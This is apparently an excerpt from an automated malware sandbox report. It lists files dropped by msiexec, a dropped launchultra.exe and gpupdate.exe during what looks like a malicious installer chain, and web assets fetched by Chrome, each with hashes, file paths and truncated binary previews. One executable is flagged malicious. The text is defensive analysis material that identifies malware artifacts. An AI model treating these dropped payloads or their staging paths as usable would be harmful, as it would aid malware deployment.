                                                SHA-512:02E3DB343037294FD3B774F954C9A617A50715E6B89D7C409F3C7DC5A1CF5ED9418158C442E9E80111994DA139A9A16DB33AC68A833D6D115C4A41BDF75751AC
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Reputation:unknown
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Pb..............0..X...........v... ........@.. ...............................E....`.................................Tv..O.......$............f...'...........u............................................... ............... ..H............text....V... ...X.................. ..`.rsrc...$............Z..............@..@.reloc...............d..............@..B.................v......H.......4...p...............xE...t......................................2~P....o....*.r...p(....*VrK..p(....s.....P...*..0.._.......~....:O....>.....%.rm..p...A...s......su....%.r...p...A...s....rm..p.su....%.r...p...B...s......su....%.r...p...B...s....r...p.su....%.r...p...C...s......su....%.r...p...C...s....r...p.su....%.r...p...D...s......su....%.r...p...D...s....r...p.su....%.r...p...E...s......su....%..r...p...E...s....r...p.su....%..r...p...F...s......su....%..r...p...F
                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                File Type:ASCII text, with no line terminators
                                                Category:dropped
                                                Size (bytes):60
                                                Entropy (8bit):4.038920595031593
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                Process:C:\Users\user\AppData\Local\Inkberry\launchultra.exe
                                                File Type:PNG image data, 3504 x 864, 8-bit/color RGB, non-interlaced
                                                Category:dropped
                                                Size (bytes):2695696
                                                Entropy (8bit):7.9979320623421115
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:5774D2C63C26B1C3F0CA126C15BE85C8
                                                SHA1:10153A82D14B2E39EFF8DB682A14893CD9167B30
                                                SHA-256:C43D21001A0FB664AA017ADCB423296695CF2157EACE6624FA3E7ED3D176A66B
                                                SHA-512:63090461298E7603293AC73D3EE18763F501DF5595B9E9D28D920EF849864F6E22EFCE1FD8437CF6E4C37E5EA9BA1273621F85460C6DD831D9CA47E26DE2F515
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:.PNG........IHDR.......`......8... .IDATx..}{xT.....}f.bK..8Xh..*...Z.D.g..[.U......*T.7....s...V.Z..:*.I.....(*...DB...2.s...gN.....$!...<.$3....$..{.k.=u{...M.:..pppp...........X....&...T:..".....a.&.8~.a...KL.$.%."..x. .H@.`.)/A..X.E.D.E{t.K.A.G'.$I..,.u...~.....$.K..K..G....K......eY..$..q...(.xM..eY.......... ....B.,..eZ.1.,!...j. .x... ...n..N..q#.%.....}..........L2...3..I.eY.S^$.!`.....y.|.j.B........'..G`Y....\O.. ..G..........,=...R.Vr)1.....9.V.?!....2x-.....A....~.z.f.nu.M..Bx....( `l.{.|........|A..$...[@.]AHn......$..K..'B..........a.0....CVd...(."..B.I..`..i...r.`.I.s...9(....)........G.....4....q.)..$... ...`....|.,.%.(.K..1.....'.?.!..m..A.$.H.."..7.....X..Z(s..G.3`..'.GN...]....1...1\X>X......1Z-.k.....A./.88...Pt..s5....|.Z..#.R.$.....*.q%....m..!...h..w.13'..J..Z.0.,.% A.M..N....,H.$K....|I..dH.A.e.....x..../IH..,.V..Qb. .....8.?%.o:...c..8..`...Nrd......!...lH.{K.7.'.V.~Y:..I~F;....qu!..(H...:.....B.mf.F.. ....I%....i
                                                Process:C:\Users\user\AppData\Local\Inkberry\launchultra.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):2709882
                                                Entropy (8bit):7.875548913573938
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:5BD63CCAE7F5015BCE796AFA9003957F
                                                SHA1:861360B16AF03B8C304E6B1A83AA3AE8415AA3AB
                                                SHA-256:673A6FB9E7E523EF1BF27AB848627848266F5BB95FB60DF574B000ACBAACEDA7
                                                SHA-512:815551584AD63F87F243F29A07E78D1582383229C1A44903F0532B46B64C779170946E0DD6DD0BE82D8F79A1DE9EC586CBCA07A51B31C685659BDD6BE5B6D351
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:Zd.Zd.Yd.Yd.Xd.}d.Y$.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.|%...%..|8..:...6.......6.......-D..7...+...8.......-...Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.....0...5......Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.....<.......8...Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.|3...-...)..+...?....0..+.......Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd./V.wQ..kS.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.Yd.
                                                Process:C:\Users\user\AppData\Local\Inkberry\launchultra.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):1797632
                                                Entropy (8bit):7.970702641492248
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:CCFE57F8B84AC564A189DF04CD60FB25
                                                SHA1:D4418D92BACB0D0C9AC1ABB92A65E1928A40A002
                                                SHA-256:E7B7235207CF79EFB7A27791520DADDF09FBF2E69D152BAB2B37E6AC36660FD9
                                                SHA-512:31287DEA5B2BC9F4EB729596BF0200202F05AE81B55F92A942C6D11FB49C8600DBA1F3A81DD07C2C5C50D4E05B4A5389CD10EC1F7F3DD84D8FD2601F436D3E6E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......J.a.............E.......E......E..............\...#...\.......\.......E...........y...........................Rich....................PE..L....AW.................2...........n.......P....@.......................................@.....................................x.......................................8...............................@............P...............................text...o0.......2.................. ..`.rdata..0g...P...h...6..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B.tls............@......................@sgfk..... ...........V..............@...................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                Category:dropped
                                                Size (bytes):1150
                                                Entropy (8bit):6.022056886282824
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:DEAB04D1A5FF1136E8E1A29DA6EDEE9B
                                                SHA1:BBDB33F8CAD66B32A17C456F90A653E6FDFB4328
                                                SHA-256:027774F44BBD2F65E71A307C77477C607F44640E98EA9E1120F29F5A5DFC4312
                                                SHA-512:1F8291F8C2CFB9EB825304F31C4707830D0B81256AD082D7E024D3B8F9343399F889DDC135DF466A2C9C13402DC03D186E79F2C0F68611E657DD548EDDB5C0A5
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:............ .h.......(....... ..... ..................................................../...O...}....TTT.......`...........................1...Q....uuu.GGG.................>>>....7...................Qbbb.888.................!!!.........///....?............................ .%%%.###.$$$.&&&.....&&&.333....?....................""".$$$.&&&.---.///.....111.###.999.777....?....................&&&.+++.111.@@@.EEE.===.888.""".TTT.BBB....?....................'''.000.^^^.....ccc.............www.ccc....=............... ................................hhh.ccc.___....1................UUU.XXX.ttt.WWW...vvv.HHH....ttt.fff....S...................E+++.222.....===......S...7...*...#...........................m........XXX.....$$$.777....v...0.............................../....TTT.888.........111.222.<<<.aaa....8..........................."...P........sss.---.XXX.KKK.:::.'''.mmmb...............................-...lXXX............000.:::....a.......................................C....QQQ.))).;;
                                                Process:C:\Windows\SysWOW64\gpupdate.exe
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):0
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:5B0C25D9CBA1796E5514EDDB17083A3F
                                                SHA1:4441DBCB0EA411BBC05C69CC1FF17E66A34ED9E4
                                                SHA-256:F9D7C59B49C870EE131D54CE051D484C3928AD7FC3DAD9DD3B74E3AD09B2C28B
                                                SHA-512:AEDE22BC485090553639FC72D402CDE4C46064D15E641F8D29664DF871A1CC9AC92CABB957CB3235AB918B11759DE0BFE9E8FA0FCD6BA554BBE755FE0BFFF946
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........p..c#..c#..c#.`"..c#.f"..c#.g"..c#..g"..c#..`"..c#..f"..c#Y}f"..c#.e"..c#.b"..c#..b#G.c#..j"..c#...#..c#...#..c#..a"..c#Rich..c#........PE..L....I.g...............$......6...................@..........................`D......E...@.......................................... ...U0...........D.xl....C......n.......................n......@m..@...............$............................text...z........................... ..`.rdata... ......."..................@..@.data........0......................@....rsrc....U0.. ...V0.................@..@.reloc........C......6C.............@..B........................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                Category:dropped
                                                Size (bytes):395680
                                                Entropy (8bit):6.42049888586084
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:72B1C6699DDC2BAAB105D32761285DF2
                                                SHA1:FC85E9FB190F205E6752624A5231515C4EE4E155
                                                SHA-256:BF7F6F7E527AB8617766BB7A21C21B2895B5275C0E808756C2AADCD66EFF8A97
                                                SHA-512:CDE1E754D8DFB2FA55DB243517B5DD3D75B209EA6387EF2E4BE6157875E536DB2373F23434A9E66C119150301C7B7CDF97DE5A5544D94C03247B4AE716CBC170
                                                Malicious:false
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 0%
                                                Reputation:unknown
                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......\...................................................Q...............................V.....J.................p...........Rich............................PE..L.....3`.........."!.........0.......X.......................................0............@............................................0........................C...'..p....................)......8(..@............................................text............................... ..`.rdata..............................@..@.data...............................@....rsrc...0...........................@..@.reloc...C.......D..................@..B........................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):4095
                                                Entropy (8bit):6.208936568057723
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:7149C9D0826E0E41BA1A9980A42581CC
                                                SHA1:09699613DA3D3A9E2B0BD801ABE75C95B2CF47D3
                                                SHA-256:E30DA94ACF170D164474EC0F4B3D50A5743B57046CB47F9131B866BFCAFC7ED5
                                                SHA-512:A657D97EB1A7277F9886AC388D9D2104F9289AD53EF577B252F5D6DD50F71985531822B0CABE67AC8C0029AC68CB89C75C51AA61B8C20BEEF8A1F53B723CA13B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:...@IXOS.@.....@...Z.@.....@.....@.....@.....@.....@......&.{E3205E05-7972-45C4-8321-B26BB5BCDBB2}..Sapor..7bc.msi.@.....@.....@.....@........&.{EB7E78DF-B6FA-49B0-B4FA-734224636FE8}.....@.....@.....@.....@.......@.....@.....@.......@......Sapor......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]...@.......@........ProcessComponents..Updating component registration...@.....@.....@.]....&.{EAB80571-66F3-4017-8A21-3D6195239CE3}6.C:\Users\user\AppData\Roaming\userche userphate\Sapor\.@.......@.....@.....@......&.{B225C053-A524-4B21-AB24-F0C6E6941AC4},.01:\Software\userche userphate\Sapor\Version.@.......@.....@.....@......&.{882C3412-68CA-4D6E-9AF2-9665DBF45098}=.C:\Users\user\AppData\Roaming\userche userphate\Sapor\32-bit\.@.......@.....@.....@......&.{521916E8-CF74-4A28-AA1E-375724E4DD49}4.C:\Users\user\AppData\Local\Inkberry\launchultra.exe.@.......@.....@.....@........CreateFolders..Creating folders..Folder: [1]".6.C:\Users\user\AppData\Roaming\Cal
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.1617216653906404
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:2BBE1618C2D0C71A1F9D850FC900ABBB
                                                SHA1:E7559D885D0CC3C3DC1313E29C37089FE5C1F1E9
                                                SHA-256:64082E3AEA0EC1DFF4BA97E92681F715FAA3DE1AD4BE84058351969FA8404862
                                                SHA-512:B9DE560AFBD3B399700C6D325EE562F6D09025B629350652FEA5EF7C33593E76D7BD522D2EB74A467B316609133A0F7995F9BA1DB3396696F91E952271F7F6D3
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.5956250959691427
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:EAF55E1B401F2507AC36070FB7B61774
                                                SHA1:40007FD642E95150B57CD972DBA82B0B0FEC5A88
                                                SHA-256:7E03A438E9AF37051A0E97C49A68352F583D21081D05A232A989F78BA5A8EFB7
                                                SHA-512:32B60AD4C9F77B398427D6EEB5DB66755992CC5AF1509583FF105777611B466C59EF1E511496ACE6344C1EDD21B24E4C1484DB51DD36A63AEFDAD5140FD451CE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:Composite Document File V2 Document, Cannot read section info
                                                Category:dropped
                                                Size (bytes):32768
                                                Entropy (8bit):1.2774681036663695
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:DB26794DEABF3EEB294B5ABEA8F24F32
                                                SHA1:29FC9123CF8949ACD26BC3316510E0506E1A2B3A
                                                SHA-256:67082687CE0534F55650F896E7F074AA33BEDFA0572C49339C8CF30BC6239496
                                                SHA-512:0CE224F3F61051FD343B84B2279A668AED35BACD50DD305B18C5E5486BA2DF5560FAB86CCD5F61C3E1D469BA53F53CC6FCF83574DF51449E1B90C329F7C9775E
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):73728
                                                Entropy (8bit):0.15033324714289925
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:05128BCA83465DA1D3327C0930591B2C
                                                SHA1:18D3A5B9983430FCD4C725EE6991C825B715B1DE
                                                SHA-256:AB7ACCD26E56132D643684CBF4A57D0A964B9531B5DEA70116ED18867C1F16E4
                                                SHA-512:41FF037AF467C35217A57F02F916BF004952CE723B9725C550D3F289F83473C6D122BA6FC7980C3D367EB4A5813DC5C1B8995435F2C52C2BF6959D78D7754C6B
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):32768
                                                Entropy (8bit):0.06814119983460382
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:374C004D765C947C4FCD713B06F0C80A
                                                SHA1:A3BD3E26DC5A2B0A02D4656578F3CBC48D553F56
                                                SHA-256:9971AC583B267022FF9E2CA761C90C381FF803DFA1D1DB56650A6DC7F6DD4C1C
                                                SHA-512:7DE76EA8A808765D974F40DBA6076AE6F95C3DED8323F9CAACE614A9C55C0FADD4C2AB28181770C32BDEEB6AD2F40D82F815574C84EBFECC7499929B41C43F83
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\System32\msiexec.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):512
                                                Entropy (8bit):0.0
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                Malicious:false
                                                Reputation:unknown
                                                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:data
                                                Category:downloaded
                                                Size (bytes):518207
                                                Entropy (8bit):7.999535450510835
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:248BE4F2DC3AC34E8BC765CC9E5B2A31
                                                SHA1:82FD93DFD81A935938C913A39E789A351AA9EA28
                                                SHA-256:FD296E9B10EE7674821C84AC01426DA43AF3612888C98C57B46125EC6EE46B65
                                                SHA-512:11292BABAD77DCE5560C537221D544D5185430F7987CBDC54BAFC4E1E8A4728C954FA016A342F7A48CB8216A15C3B2ADCD6938765F7DF5DFD23FAE431739639D
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/uploads/2023/11/Ravinn-desktop-1600x800-1.mp4:2f905610c59538:4
                                                Preview:\..`.S.o.w...[b.....].A9......w...T.g00.b/...qwgI.bI...>.B...'....(..E.`Zh...i[.(..1......+....O...k...{..q.S..9....G>.L...L..,N..Z.,zo.&.+...-U..Pq.z....#.cV......7 .l........s....-I..~>. .2..t..G..G..e..o..c.....+..w\.....".1W[..._..wE.@.7je....z...q.?U...IF....MP....13R|...'...'..g...O..@...K....&.;..uXj..t)...Fa.l.HS2.q...Ji}.....(_..p+'^.dF3.b....&.._.i.../}".5."7....-E.!Z.G....{...JS@.."a.....L.~....j...h^..%..t.X..L......H..r....{s........h..H.....0..@Xa.j.a..N].......0[D.cs$J.Y...>....pa#.Fy.X`..~.~'d4.N...iw......9. .@.]`.S..Z....W#..".nTd.Nhj.B.z.SEv.e.3.q....PY..)..{.U..\.T...RH^>.>.\^.....J.F..?..p!d.c............U..M..~.#6.0.6g..l<....ask...F....o...~ H..(.\p.{...R=:.....l..0.$*./.j..d.2%#"......@Z7<...8.T.B.(Nv... .1.G=..h.~........ ...hZ._.<.....[C.....q.QU..&.C_..iL.R;/.....F..=v.x..V.G....s<..m'............!$6..h1.....d.O......j....|l..z.MG.t.Y..R/..b>(..h.....5.P......7.x/..=]].K!<8..J..=ek.....0L.J.[.QE...o.
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):70168
                                                Entropy (8bit):4.766275535503849
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:DB7EFFC93A1F3204406EB0153D887998
                                                SHA1:F70CA4E13AC355B0D8164D1A74ECB6247A255535
                                                SHA-256:BE29466252A678E7ED5766A1E8A7DDE73188AE354D4FF5F408E7405AD8B9EA8E
                                                SHA-512:1BD65E37FF97E9E4AD4A4EABC113208D35AC9255B095E8EE695F5E6AACDA975D94E40D1C5E9453B660D4E014E6E950F593F9BC05A2F33B9E07CEE0C45DFC7F5B
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/themes/ravinn/css/all.css
                                                Preview:/*!. * Font Awesome Free 5.9.0 by @fontawesome - https://fontawesome.com. * License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License). */..fa,..fas,..far,..fal,..fab {. -moz-osx-font-smoothing: grayscale;. -webkit-font-smoothing: antialiased;. display: inline-block;. font-style: normal;. font-variant: normal;. text-rendering: auto;. line-height: 1; }...fa-lg {. font-size: 1.33333em;. line-height: 0.75em;. vertical-align: -.0667em; }...fa-xs {. font-size: .75em; }...fa-sm {. font-size: .875em; }...fa-1x {. font-size: 1em; }...fa-2x {. font-size: 2em; }...fa-3x {. font-size: 3em; }...fa-4x {. font-size: 4em; }...fa-5x {. font-size: 5em; }...fa-6x {. font-size: 6em; }...fa-7x {. font-size: 7em; }...fa-8x {. font-size: 8em; }...fa-9x {. font-size: 9em; }...fa-10x {. font-size: 10em; }...fa-fw {. text-align: center;. width: 1.25em; }...fa-ul {. list-style-type: none;. margin-left: 2.5em;. padding-left: 0; }. .fa-ul >
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:Web Open Font Format (Version 2), TrueType, length 32272, version 1.0
                                                Category:downloaded
                                                Size (bytes):32272
                                                Entropy (8bit):7.993066937172994
                                                Encrypted:true
                                                SSDEEP:
                                                MD5:91C1ABDE26995ED2F211F73C11F96047
                                                SHA1:0B10CFF8BDBCBA61D5B6797214627912BCA4AE45
                                                SHA-256:45447A2B45991EA4E67FF0866444CA07FCF62C28DBFD5FA072AB76D3D0C46390
                                                SHA-512:29508E0995FAF428B7FDBF6A867E898279910A647F8A5D0EA46DBC0998A9D679AB4BAFCBFB26688281993BF5D417D639F65600099BB6E655350F9F819C4837E1
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://fonts.gstatic.com/s/outfit/v11/QGYvz_MVcBeNP4NJtEtq.woff2
                                                Preview:wOF2......~...........}..................................|?HVAR..?MVARP.`?STAT...../l.......p..v.0....6.$..h. ..Z.....[..Q.6...z.*._.>.....@......6..i.G*...9Nd(...Z.......rUh..1.X..].i.l..yV.y...8[.....A.1..1.....R3.!K..q.%.....+x.'q6.N.:Q.v..3[.U1..J$8.;..DJy../.t4....V8......._.s{9P.jR....g..t.......$..Y.......~........8.h...F.`.c.].P.I..y.m..{..D $W.HfD.Dfff.f...7k..._m.X&.L.Pq.)....\.Z.....o.l.E|........W@U...J.P.cUV..I.}oH..id..g...l|W.W]....h..q.vl.[3<...'.4.".H#.C.(..v...v.6..........m.~p.?.....ft.m..*..&.h..j.ud...3`l........Qv..z...m..2....Z7....cbT."...... @M[..Y.<&..@.0..|...u...../.......eN......LjD.j*.... Ra.C...}....b..(..b..\.z.......\+.-b..nvc..e7...Nu....|:.....)uY..{.L../>..._.5S.m!G.2o..o...:.B.H..o.TH.0.ycP3tf..%.h.'*y.[Q...hBV.._._..k>.SPx>..CMM.k.9U.....0...Q.Z..@._..2..q..$q3iS.Q..O....l..5}.+.....N.&G....ql+..s.c.V...@i.....r...].;r.b..m.c.!V..E....{|.._}I.I_o4.a...'.Q.I.....a.SHE...K...}.m].....[...=@U....`.laF........Y.|r...
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (65447)
                                                Category:downloaded
                                                Size (bytes):87553
                                                Entropy (8bit):5.262620498676155
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:826EB77E86B02AB7724FE3D0141FF87C
                                                SHA1:79CD3587D565AFE290076A8D36C31C305A573D18
                                                SHA-256:CB6F2D32C49D1C2B25E9FFC9AAAFA3F83075346C01BCD4AE6EB187392A4292CF
                                                SHA-512:FC79FDB76763025DC39FAC045A215FF155EF2F492A0E9640079D6F089FA6218AF2B3AB7C6EAF636827DEE9294E6939A95AB24554E870C976679C25567AD6374C
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-includes/js/jquery/jquery.min.js?ver=3.7.1
                                                Preview:/*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.remove
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text
                                                Category:downloaded
                                                Size (bytes):14315
                                                Entropy (8bit):4.6771507438734075
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:5811BD2D3557DF45A0E77F17848F1A15
                                                SHA1:C708F5F5F3BF355162D3F0693FD21B3E97A35A5F
                                                SHA-256:B0348ED865B7512ECD84AFDE2FA10EE4C306AC7E3E2C492080B9244A5065D3E4
                                                SHA-512:12B761B49050A69F96401768B912D490D7F67158AE8ECDBDA690AE535ED2C3C235605C3F5BB0FF9998879607A95050A83CA8FAADF6D64C7B4DF642C9096FC746
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.ravinn.com/wp-content/themes/ravinn/js/splide-extension-auto-scroll.js
                                                Preview:/*!. * @splidejs/splide-extension-auto-scroll. * Version : 0.5.2. * License : MIT. * Copyright: 2022 Naotoshi Fujita. */.(function (factory) {. typeof define === 'function' && define.amd ? define(factory) : factory();.})(function () {. 'use strict';.. function empty(array) {. array.length = 0;. }.. function slice$1(arrayLike, start, end) {. return Array.prototype.slice.call(arrayLike, start, end);. }.. function apply$1(func) {. return func.bind.apply(func, [null].concat(slice$1(arguments, 1)));. }.. function raf(func) {. return requestAnimationFrame(func);. }.. function typeOf$1(type, subject) {. return typeof subject === type;. }.. var isArray$1 = Array.isArray;. apply$1(typeOf$1, "function");. apply$1(typeOf$1, "string");. apply$1(typeOf$1, "undefined");.. function toArray$1(value) {. return isArray$1(value) ? value : [value];. }.. function forEach$1(values, iteratee) {. toArray$1(values).forEach(iteratee);. }.. var ownKeys$1 = Object.keys;
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:ASCII text, with very long lines (6129)
                                                Category:downloaded
                                                Size (bytes):357687
                                                Entropy (8bit):5.609233732987856
                                                Encrypted:false
                                                SSDEEP:
                                                MD5:AB2AC07B1144F66A815AF3DFE9B8F9A4
                                                SHA1:D3D816C53F7588A869A4EB6EB0D681EE271D5667
                                                SHA-256:F6A495F41E50175AE784832E8D4735C236B5F3281532B468BAFF088A35340004
                                                SHA-512:B27B244ECF0F5A0E0A0153AD6439CBFE8E2F986E5435F3E20210E6B3BDA5A11EDD023EB32F36047446F6115278BAAFEFE5A4C674311581DF1F6E21E46F35FFC9
                                                Malicious:false
                                                Reputation:unknown
                                                URL:https://www.googletagmanager.com/gtag/js?id=G-63LK6Z20GR&l=dataLayer&cx=c&gtm=45He53v1v9179158579za200&tag_exp=102509683~102788824~102803279~102813109~102887800~102926062~102975949~102976415
                                                Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ip_mark","priority":12,"vtp_instanceOrder":0,"vtp_paramValue":"Blaikie_Street","vtp_ruleResult":["macro",1],"tag_id":7},{"function":"__ogt_ip_mark","priority":12,"vtp_instanceOrder":1,"vtp_paramValue":"Byres_Street","vtp_ruleResult":["macro",2],"tag_id":9},{"function":"__ogt_1p_data_v2","priority":12,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValu
                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                File Type:SVG Scalable Vector Graphics image
                                                Category:downloaded
                                                Size (bytes):11779
                                                Entropy (8bit):3.75721626200162
